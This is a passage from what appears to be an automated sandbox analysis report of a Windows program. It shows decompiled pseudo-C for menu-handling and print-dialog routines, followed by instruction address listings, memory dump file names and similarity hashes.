                                                                                                                                                                                                                                                                                          									_t156 = _v140 + 1;
                                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_push(0x14);
                                                                                                                                                                                                                                                                                          									_v208.fMask = 0x31;
                                                                                                                                                                                                                                                                                          									_v8 = 1;
                                                                                                                                                                                                                                                                                          									_t105 = E001065FC( &_v208, _t150, _t156, __eflags);
                                                                                                                                                                                                                                                                                          									_t164 = _t164 + 4;
                                                                                                                                                                                                                                                                                          									__eflags = _t105;
                                                                                                                                                                                                                                                                                          									if(_t105 == 0) {
                                                                                                                                                                                                                                                                                          										_t159 = 0;
                                                                                                                                                                                                                                                                                          										__eflags = 0;
                                                                                                                                                                                                                                                                                          										_v160 = 0;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										 *_t105 = 0x1313;
                                                                                                                                                                                                                                                                                          										_t159 = _t105;
                                                                                                                                                                                                                                                                                          										_v160 = _t105;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_v8 = 0;
                                                                                                                                                                                                                                                                                          									__eflags = _t159;
                                                                                                                                                                                                                                                                                          									if(_t159 == 0) {
                                                                                                                                                                                                                                                                                          										goto L37;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										 *((intOrPtr*)(_t159 + 8)) = _v208.fType;
                                                                                                                                                                                                                                                                                          										 *((intOrPtr*)(_t159 + 0xc)) = _v208.fState;
                                                                                                                                                                                                                                                                                          										_v208.fType = _v208.fType | 0x00000100;
                                                                                                                                                                                                                                                                                          										 *(_t159 + 0x10) = 0xffffffff;
                                                                                                                                                                                                                                                                                          										_t146 =  *(_t150 + 0x50);
                                                                                                                                                                                                                                                                                          										_t107 = 0;
                                                                                                                                                                                                                                                                                          										__eflags = _t146;
                                                                                                                                                                                                                                                                                          										if(__eflags <= 0) {
                                                                                                                                                                                                                                                                                          											L30:
                                                                                                                                                                                                                                                                                          											_t61 = lstrlenA( &_v136) + 1; // 0x1
                                                                                                                                                                                                                                                                                          											_t152 = _t61;
                                                                                                                                                                                                                                                                                          											_push(_t152);
                                                                                                                                                                                                                                                                                          											_v148 = _t152;
                                                                                                                                                                                                                                                                                          											 *(_t159 + 4) = 0;
                                                                                                                                                                                                                                                                                          											_v8 = 3;
                                                                                                                                                                                                                                                                                          											_t109 = E00105DD7( &_v136, _t152, _t159, __eflags);
                                                                                                                                                                                                                                                                                          											_t164 = _t164 + 4;
                                                                                                                                                                                                                                                                                          											 *(_t159 + 4) = _t109;
                                                                                                                                                                                                                                                                                          											_v8 = 0;
                                                                                                                                                                                                                                                                                          											_t126 =  *(_t159 + 4);
                                                                                                                                                                                                                                                                                          											__eflags = _t126;
                                                                                                                                                                                                                                                                                          											if(_t126 != 0) {
                                                                                                                                                                                                                                                                                          												_t113 = lstrlenA( &_v136);
                                                                                                                                                                                                                                                                                          												__eflags = _t152 - _t113;
                                                                                                                                                                                                                                                                                          												if(_t152 > _t113) {
                                                                                                                                                                                                                                                                                          													lstrcpyA(_t126,  &_v136);
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											_t145 =  &_v208;
                                                                                                                                                                                                                                                                                          											_v208.dwItemData = _t159;
                                                                                                                                                                                                                                                                                          											SetMenuItemInfoA(_v144, _v140, 1,  &_v208);
                                                                                                                                                                                                                                                                                          											_t123 = _v144;
                                                                                                                                                                                                                                                                                          											_t150 = _v152;
                                                                                                                                                                                                                                                                                          											goto L37;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_t127 = _v208.wID;
                                                                                                                                                                                                                                                                                          											while(1) {
                                                                                                                                                                                                                                                                                          												__eflags = _t107;
                                                                                                                                                                                                                                                                                          												if(_t107 < 0) {
                                                                                                                                                                                                                                                                                          													break;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												__eflags = _t107 - _t146;
                                                                                                                                                                                                                                                                                          												if(_t107 >= _t146) {
                                                                                                                                                                                                                                                                                          													break;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													__eflags = ( *( *((intOrPtr*)(_t150 + 0x4c)) + _t107 * 2) & 0x0000ffff) - _t127;
                                                                                                                                                                                                                                                                                          													if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          														 *(_t159 + 0x10) = _t107;
                                                                                                                                                                                                                                                                                          														goto L30;
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          														_t107 = _t107 + 1;
                                                                                                                                                                                                                                                                                          														__eflags = _t107 - _t146;
                                                                                                                                                                                                                                                                                          														if(__eflags < 0) {
                                                                                                                                                                                                                                                                                          															continue;
                                                                                                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                                                                                                          															goto L30;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												goto L41;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											RaiseException(0xc000008c, 1, 0, 0);
                                                                                                                                                                                                                                                                                          											_v8 = 0;
                                                                                                                                                                                                                                                                                          											return E000FE542;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L41;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v148 = _t123;
                                                                                                                                                                                                                                                                                          							E00101C50( &_v148, _t150 + 0x14);
                                                                                                                                                                                                                                                                                          							goto L39;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						__eflags = _t145 & 0x00000001;
                                                                                                                                                                                                                                                                                          						if((_t145 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                          							goto L1;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							goto L4;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					L1:
                                                                                                                                                                                                                                                                                          					 *_t121 = 0;
                                                                                                                                                                                                                                                                                          					_t97 = 1;
                                                                                                                                                                                                                                                                                          					L40:
                                                                                                                                                                                                                                                                                          					 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          					_pop(_t151);
                                                                                                                                                                                                                                                                                          					_pop(_t155);
                                                                                                                                                                                                                                                                                          					_pop(_t122);
                                                                                                                                                                                                                                                                                          					return E001059E6(_t97, _t122, _v28 ^ _t161, _t145, _t151, _t155);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L41:
                                                                                                                                                                                                                                                                                          			}















































                                                                                                                                                                                                                                                                                          0x000fe2d0
                                                                                                                                                                                                                                                                                          0x000fe2d1
                                                                                                                                                                                                                                                                                          0x000fe2d3
                                                                                                                                                                                                                                                                                          0x000fe2d5
                                                                                                                                                                                                                                                                                          0x000fe2e0
                                                                                                                                                                                                                                                                                          0x000fe2e1
                                                                                                                                                                                                                                                                                          0x000fe2e7
                                                                                                                                                                                                                                                                                          0x000fe2ec
                                                                                                                                                                                                                                                                                          0x000fe2ee
                                                                                                                                                                                                                                                                                          0x000fe2f4
                                                                                                                                                                                                                                                                                          0x000fe2f8
                                                                                                                                                                                                                                                                                          0x000fe2fe
                                                                                                                                                                                                                                                                                          0x000fe301
                                                                                                                                                                                                                                                                                          0x000fe304
                                                                                                                                                                                                                                                                                          0x000fe30c
                                                                                                                                                                                                                                                                                          0x000fe30e
                                                                                                                                                                                                                                                                                          0x000fe316
                                                                                                                                                                                                                                                                                          0x000fe328
                                                                                                                                                                                                                                                                                          0x000fe332
                                                                                                                                                                                                                                                                                          0x000fe332
                                                                                                                                                                                                                                                                                          0x000fe334
                                                                                                                                                                                                                                                                                          0x000fe33b
                                                                                                                                                                                                                                                                                          0x000fe33b
                                                                                                                                                                                                                                                                                          0x000fe33d
                                                                                                                                                                                                                                                                                          0x000fe37b
                                                                                                                                                                                                                                                                                          0x000fe37d
                                                                                                                                                                                                                                                                                          0x000fe397
                                                                                                                                                                                                                                                                                          0x000fe397
                                                                                                                                                                                                                                                                                          0x000fe37f
                                                                                                                                                                                                                                                                                          0x000fe37f
                                                                                                                                                                                                                                                                                          0x000fe382
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe384
                                                                                                                                                                                                                                                                                          0x000fe38f
                                                                                                                                                                                                                                                                                          0x000fe38f
                                                                                                                                                                                                                                                                                          0x000fe382
                                                                                                                                                                                                                                                                                          0x000fe39c
                                                                                                                                                                                                                                                                                          0x000fe39f
                                                                                                                                                                                                                                                                                          0x000fe3a3
                                                                                                                                                                                                                                                                                          0x000fe3a4
                                                                                                                                                                                                                                                                                          0x000fe3a5
                                                                                                                                                                                                                                                                                          0x000fe3a6
                                                                                                                                                                                                                                                                                          0x000fe33f
                                                                                                                                                                                                                                                                                          0x000fe33f
                                                                                                                                                                                                                                                                                          0x000fe341
                                                                                                                                                                                                                                                                                          0x000fe369
                                                                                                                                                                                                                                                                                          0x000fe369
                                                                                                                                                                                                                                                                                          0x000fe371
                                                                                                                                                                                                                                                                                          0x000fe375
                                                                                                                                                                                                                                                                                          0x000fe376
                                                                                                                                                                                                                                                                                          0x000fe377
                                                                                                                                                                                                                                                                                          0x000fe378
                                                                                                                                                                                                                                                                                          0x000fe343
                                                                                                                                                                                                                                                                                          0x000fe343
                                                                                                                                                                                                                                                                                          0x000fe346
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe348
                                                                                                                                                                                                                                                                                          0x000fe353
                                                                                                                                                                                                                                                                                          0x000fe359
                                                                                                                                                                                                                                                                                          0x000fe35f
                                                                                                                                                                                                                                                                                          0x000fe363
                                                                                                                                                                                                                                                                                          0x000fe364
                                                                                                                                                                                                                                                                                          0x000fe365
                                                                                                                                                                                                                                                                                          0x000fe366
                                                                                                                                                                                                                                                                                          0x000fe366
                                                                                                                                                                                                                                                                                          0x000fe346
                                                                                                                                                                                                                                                                                          0x000fe341
                                                                                                                                                                                                                                                                                          0x000fe3a7
                                                                                                                                                                                                                                                                                          0x000fe3ad
                                                                                                                                                                                                                                                                                          0x000fe3b4
                                                                                                                                                                                                                                                                                          0x000fe3ba
                                                                                                                                                                                                                                                                                          0x000fe5c3
                                                                                                                                                                                                                                                                                          0x000fe5c3
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe3c0
                                                                                                                                                                                                                                                                                          0x000fe3c0
                                                                                                                                                                                                                                                                                          0x000fe3c2
                                                                                                                                                                                                                                                                                          0x000fe3c8
                                                                                                                                                                                                                                                                                          0x000fe3c8
                                                                                                                                                                                                                                                                                          0x000fe3ca
                                                                                                                                                                                                                                                                                          0x000fe3cd
                                                                                                                                                                                                                                                                                          0x000fe3ce
                                                                                                                                                                                                                                                                                          0x000fe3d4
                                                                                                                                                                                                                                                                                          0x000fe3da
                                                                                                                                                                                                                                                                                          0x000fe3dc
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe3ed
                                                                                                                                                                                                                                                                                          0x000fe3f2
                                                                                                                                                                                                                                                                                          0x000fe3f5
                                                                                                                                                                                                                                                                                          0x000fe3ff
                                                                                                                                                                                                                                                                                          0x000fe404
                                                                                                                                                                                                                                                                                          0x000fe406
                                                                                                                                                                                                                                                                                          0x000fe408
                                                                                                                                                                                                                                                                                          0x000fe408
                                                                                                                                                                                                                                                                                          0x000fe412
                                                                                                                                                                                                                                                                                          0x000fe423
                                                                                                                                                                                                                                                                                          0x000fe42d
                                                                                                                                                                                                                                                                                          0x000fe437
                                                                                                                                                                                                                                                                                          0x000fe43d
                                                                                                                                                                                                                                                                                          0x000fe443
                                                                                                                                                                                                                                                                                          0x000fe44d
                                                                                                                                                                                                                                                                                          0x000fe5a3
                                                                                                                                                                                                                                                                                          0x000fe5a9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe453
                                                                                                                                                                                                                                                                                          0x000fe453
                                                                                                                                                                                                                                                                                          0x000fe455
                                                                                                                                                                                                                                                                                          0x000fe45f
                                                                                                                                                                                                                                                                                          0x000fe463
                                                                                                                                                                                                                                                                                          0x000fe468
                                                                                                                                                                                                                                                                                          0x000fe46b
                                                                                                                                                                                                                                                                                          0x000fe46d
                                                                                                                                                                                                                                                                                          0x000fe47f
                                                                                                                                                                                                                                                                                          0x000fe47f
                                                                                                                                                                                                                                                                                          0x000fe481
                                                                                                                                                                                                                                                                                          0x000fe46f
                                                                                                                                                                                                                                                                                          0x000fe46f
                                                                                                                                                                                                                                                                                          0x000fe475
                                                                                                                                                                                                                                                                                          0x000fe477
                                                                                                                                                                                                                                                                                          0x000fe477
                                                                                                                                                                                                                                                                                          0x000fe487
                                                                                                                                                                                                                                                                                          0x000fe48e
                                                                                                                                                                                                                                                                                          0x000fe490
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe496
                                                                                                                                                                                                                                                                                          0x000fe49c
                                                                                                                                                                                                                                                                                          0x000fe4a5
                                                                                                                                                                                                                                                                                          0x000fe4a8
                                                                                                                                                                                                                                                                                          0x000fe4b2
                                                                                                                                                                                                                                                                                          0x000fe4b9
                                                                                                                                                                                                                                                                                          0x000fe4bc
                                                                                                                                                                                                                                                                                          0x000fe4be
                                                                                                                                                                                                                                                                                          0x000fe4c0
                                                                                                                                                                                                                                                                                          0x000fe4e2
                                                                                                                                                                                                                                                                                          0x000fe4ef
                                                                                                                                                                                                                                                                                          0x000fe4ef
                                                                                                                                                                                                                                                                                          0x000fe4f4
                                                                                                                                                                                                                                                                                          0x000fe4f5
                                                                                                                                                                                                                                                                                          0x000fe4fb
                                                                                                                                                                                                                                                                                          0x000fe4fe
                                                                                                                                                                                                                                                                                          0x000fe502
                                                                                                                                                                                                                                                                                          0x000fe507
                                                                                                                                                                                                                                                                                          0x000fe50a
                                                                                                                                                                                                                                                                                          0x000fe50d
                                                                                                                                                                                                                                                                                          0x000fe54e
                                                                                                                                                                                                                                                                                          0x000fe551
                                                                                                                                                                                                                                                                                          0x000fe553
                                                                                                                                                                                                                                                                                          0x000fe55c
                                                                                                                                                                                                                                                                                          0x000fe562
                                                                                                                                                                                                                                                                                          0x000fe564
                                                                                                                                                                                                                                                                                          0x000fe56e
                                                                                                                                                                                                                                                                                          0x000fe56e
                                                                                                                                                                                                                                                                                          0x000fe564
                                                                                                                                                                                                                                                                                          0x000fe580
                                                                                                                                                                                                                                                                                          0x000fe58b
                                                                                                                                                                                                                                                                                          0x000fe591
                                                                                                                                                                                                                                                                                          0x000fe597
                                                                                                                                                                                                                                                                                          0x000fe59d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe4c2
                                                                                                                                                                                                                                                                                          0x000fe4c2
                                                                                                                                                                                                                                                                                          0x000fe4c8
                                                                                                                                                                                                                                                                                          0x000fe4c8
                                                                                                                                                                                                                                                                                          0x000fe4ca
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe4cc
                                                                                                                                                                                                                                                                                          0x000fe4ce
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe4d0
                                                                                                                                                                                                                                                                                          0x000fe4d9
                                                                                                                                                                                                                                                                                          0x000fe4db
                                                                                                                                                                                                                                                                                          0x000fe51f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe4dd
                                                                                                                                                                                                                                                                                          0x000fe4dd
                                                                                                                                                                                                                                                                                          0x000fe4de
                                                                                                                                                                                                                                                                                          0x000fe4e0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe4e0
                                                                                                                                                                                                                                                                                          0x000fe4db
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe4ce
                                                                                                                                                                                                                                                                                          0x000fe52f
                                                                                                                                                                                                                                                                                          0x000fe535
                                                                                                                                                                                                                                                                                          0x000fe541
                                                                                                                                                                                                                                                                                          0x000fe541
                                                                                                                                                                                                                                                                                          0x000fe4c0
                                                                                                                                                                                                                                                                                          0x000fe490
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe44d
                                                                                                                                                                                                                                                                                          0x000fe5af
                                                                                                                                                                                                                                                                                          0x000fe5be
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe5be
                                                                                                                                                                                                                                                                                          0x000fe336
                                                                                                                                                                                                                                                                                          0x000fe336
                                                                                                                                                                                                                                                                                          0x000fe339
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe339
                                                                                                                                                                                                                                                                                          0x000fe318
                                                                                                                                                                                                                                                                                          0x000fe318
                                                                                                                                                                                                                                                                                          0x000fe318
                                                                                                                                                                                                                                                                                          0x000fe31e
                                                                                                                                                                                                                                                                                          0x000fe5c9
                                                                                                                                                                                                                                                                                          0x000fe5cc
                                                                                                                                                                                                                                                                                          0x000fe5d4
                                                                                                                                                                                                                                                                                          0x000fe5d5
                                                                                                                                                                                                                                                                                          0x000fe5d6
                                                                                                                                                                                                                                                                                          0x000fe5e4
                                                                                                                                                                                                                                                                                          0x000fe5e4
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ItemMenu$CallCountInfoMessageProcSendWindow_memset
                                                                                                                                                                                                                                                                                          • String ID: ,$1$d
                                                                                                                                                                                                                                                                                          • API String ID: 3483846687-1943914033
                                                                                                                                                                                                                                                                                          • Opcode ID: ad6b371fc69b29cca03a1db630f8ca8107023c853cefb6bbdcf01cbbf5e7542e
                                                                                                                                                                                                                                                                                          • Instruction ID: 2de586cf72766c9a7004449c3f83c9ab74789e4e493d502be6a5d9be1b012143
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad6b371fc69b29cca03a1db630f8ca8107023c853cefb6bbdcf01cbbf5e7542e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2191B5B0901659EFEB24CF14CD84FAEB7B5FB48704F008199EA4997690D774AE84DFA0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                                                                                                          			E000F9110(intOrPtr __ecx, struct HWND__* __edx, void* __eflags) {
                                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                                                                                                                          				intOrPtr* _v96;
                                                                                                                                                                                                                                                                                          				intOrPtr _v100;
                                                                                                                                                                                                                                                                                          				signed int _v104;
                                                                                                                                                                                                                                                                                          				signed int _v108;
                                                                                                                                                                                                                                                                                          				signed int _v112;
                                                                                                                                                                                                                                                                                          				signed int _v128;
                                                                                                                                                                                                                                                                                          				char _v132;
                                                                                                                                                                                                                                                                                          				short _v144;
                                                                                                                                                                                                                                                                                          				signed int _v148;
                                                                                                                                                                                                                                                                                          				signed int _v180;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t87;
                                                                                                                                                                                                                                                                                          				char* _t94;
                                                                                                                                                                                                                                                                                          				void* _t97;
                                                                                                                                                                                                                                                                                          				void* _t105;
                                                                                                                                                                                                                                                                                          				signed int _t109;
                                                                                                                                                                                                                                                                                          				void* _t112;
                                                                                                                                                                                                                                                                                          				unsigned int _t116;
                                                                                                                                                                                                                                                                                          				signed int* _t136;
                                                                                                                                                                                                                                                                                          				signed int _t138;
                                                                                                                                                                                                                                                                                          				intOrPtr _t156;
                                                                                                                                                                                                                                                                                          				void* _t177;
                                                                                                                                                                                                                                                                                          				signed int* _t178;
                                                                                                                                                                                                                                                                                          				intOrPtr _t184;
                                                                                                                                                                                                                                                                                          				signed int _t188;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010FB73);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t87 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_push(_t87 ^ _t188);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t184 = __ecx;
                                                                                                                                                                                                                                                                                          				if(E000F8E40(__edx, __ecx) != 0) {
                                                                                                                                                                                                                                                                                          					_v128 = 0;
                                                                                                                                                                                                                                                                                          					_v112 = 0;
                                                                                                                                                                                                                                                                                          					_v108 = 0;
                                                                                                                                                                                                                                                                                          					_v104 = 0;
                                                                                                                                                                                                                                                                                          					_v100 = DefWindowProcA;
                                                                                                                                                                                                                                                                                          					_v96 =  &_v92;
                                                                                                                                                                                                                                                                                          					E00106820( &_v92, 0, 0x42);
                                                                                                                                                                                                                                                                                          					 *_v96 = 0x42;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_v96 + 4)) = 0;
                                                                                                                                                                                                                                                                                          					 *(_v96 + 0x14) = 0x4300c;
                                                                                                                                                                                                                                                                                          					_t94 =  &M000F56C0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_v96 + 0x2a)) = _t94;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_v96 + 0x2e)) = _t94;
                                                                                                                                                                                                                                                                                          					 *(_v96 + 0x14) =  *(_v96 + 0x14) | 0x00000100;
                                                                                                                                                                                                                                                                                          					 *(_v96 + 0x14) =  *(_v96 + 0x14) & 0xfffffdff;
                                                                                                                                                                                                                                                                                          					_v132 = 0x112d7c;
                                                                                                                                                                                                                                                                                          					_t136 = _t184 + 0x4bc;
                                                                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                                                                          					__eflags =  *_t136;
                                                                                                                                                                                                                                                                                          					if( *_t136 == 0) {
                                                                                                                                                                                                                                                                                          						L6:
                                                                                                                                                                                                                                                                                          						_t97 = 0;
                                                                                                                                                                                                                                                                                          						__eflags = 0;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						__eflags = _t136[1];
                                                                                                                                                                                                                                                                                          						if(_t136[1] == 0) {
                                                                                                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t127 = _t136[1];
                                                                                                                                                                                                                                                                                          							_t181 = ( *(_t136[1] + 0x26) & 0x0000ffff) + ( *(_t127 + 0x24) & 0x0000ffff);
                                                                                                                                                                                                                                                                                          							_t97 = GlobalAlloc(2, ( *(_t136[1] + 0x26) & 0x0000ffff) + ( *(_t127 + 0x24) & 0x0000ffff));
                                                                                                                                                                                                                                                                                          							_v20 = _t97;
                                                                                                                                                                                                                                                                                          							__eflags = _t97;
                                                                                                                                                                                                                                                                                          							if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          								E001096A0(GlobalLock(_t97), _t136[1], _t181);
                                                                                                                                                                                                                                                                                          								GlobalUnlock(_v20);
                                                                                                                                                                                                                                                                                          								_t97 = _v20;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					 *(_v96 + 8) = _t97;
                                                                                                                                                                                                                                                                                          					 *(_v96 + 0xc) = E000FC710(_t184 + 0x4b8, __eflags);
                                                                                                                                                                                                                                                                                          					 *((short*)(_v96 + 0x1c)) = 1;
                                                                                                                                                                                                                                                                                          					 *((short*)(_v96 + 0x1e)) =  *((intOrPtr*)(_t184 + 0x530));
                                                                                                                                                                                                                                                                                          					 *((short*)(_v96 + 0x18)) = 1;
                                                                                                                                                                                                                                                                                          					 *((short*)(_v96 + 0x1a)) =  *((intOrPtr*)(_t184 + 0x530));
                                                                                                                                                                                                                                                                                          					 *(_v96 + 0x14) =  *(_v96 + 0x14) & 0xfffffff7;
                                                                                                                                                                                                                                                                                          					_t105 = E000FAF50(GetActiveWindow(),  &_v132, _t184);
                                                                                                                                                                                                                                                                                          					__eflags = _t105 - 1;
                                                                                                                                                                                                                                                                                          					if(_t105 == 1) {
                                                                                                                                                                                                                                                                                          						_t177 =  *(_v96 + 8);
                                                                                                                                                                                                                                                                                          						__eflags = _t177;
                                                                                                                                                                                                                                                                                          						if(_t177 != 0) {
                                                                                                                                                                                                                                                                                          							E000FFE10(GlobalLock(_t177), _t136);
                                                                                                                                                                                                                                                                                          							GlobalUnlock(_t177);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t112 =  *(_t184 + 0x4b8);
                                                                                                                                                                                                                                                                                          						_t178 = _t184 + 0x4b8;
                                                                                                                                                                                                                                                                                          						__eflags = _t112;
                                                                                                                                                                                                                                                                                          						if(_t112 != 0) {
                                                                                                                                                                                                                                                                                          							ClosePrinter(_t112);
                                                                                                                                                                                                                                                                                          							 *_t178 = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						E000FC5D0( *((intOrPtr*)(_t184 + 0x4c0)), _t178,  *(_v96 + 0xc));
                                                                                                                                                                                                                                                                                          						_t138 = 0;
                                                                                                                                                                                                                                                                                          						_v180 = 0;
                                                                                                                                                                                                                                                                                          						_v148 = 0;
                                                                                                                                                                                                                                                                                          						_v144 = 0x100;
                                                                                                                                                                                                                                                                                          						_v8 = 1;
                                                                                                                                                                                                                                                                                          						_t156 = _v96;
                                                                                                                                                                                                                                                                                          						_t116 =  *(_t156 + 0x14);
                                                                                                                                                                                                                                                                                          						_t171 =  *((intOrPtr*)(_t184 + 0x530)) - 1;
                                                                                                                                                                                                                                                                                          						__eflags = _t116 & 0x00000002;
                                                                                                                                                                                                                                                                                          						if((_t116 & 0x00000002) != 0) {
                                                                                                                                                                                                                                                                                          							_t138 = ( *(_t156 + 0x18) & 0x0000ffff) - 1;
                                                                                                                                                                                                                                                                                          							_t171 = ( *(_t156 + 0x1a) & 0x0000ffff) - 1;
                                                                                                                                                                                                                                                                                          							__eflags = ( *(_t156 + 0x1a) & 0x0000ffff) - 1;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						E000F6510( &_v180, _t184 + 0x34, _t171,  *_t178,  *((intOrPtr*)(_t184 + 0x4c0)), _t138, _t116 >> 0x00000005 & 1);
                                                                                                                                                                                                                                                                                          						__eflags = _v180;
                                                                                                                                                                                                                                                                                          						if(_v180 != 0) {
                                                                                                                                                                                                                                                                                          							_v180 = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					GlobalFree( *(_v96 + 8));
                                                                                                                                                                                                                                                                                          					GlobalFree( *(_v96 + 0xc));
                                                                                                                                                                                                                                                                                          					_v8 = 0xffffffff;
                                                                                                                                                                                                                                                                                          					_t109 = _v112;
                                                                                                                                                                                                                                                                                          					__eflags = _t109;
                                                                                                                                                                                                                                                                                          					if(_t109 != 0) {
                                                                                                                                                                                                                                                                                          						E00105701(_t109);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					__eflags = 0;
                                                                                                                                                                                                                                                                                          					 *[fs:0x0] = _v16;
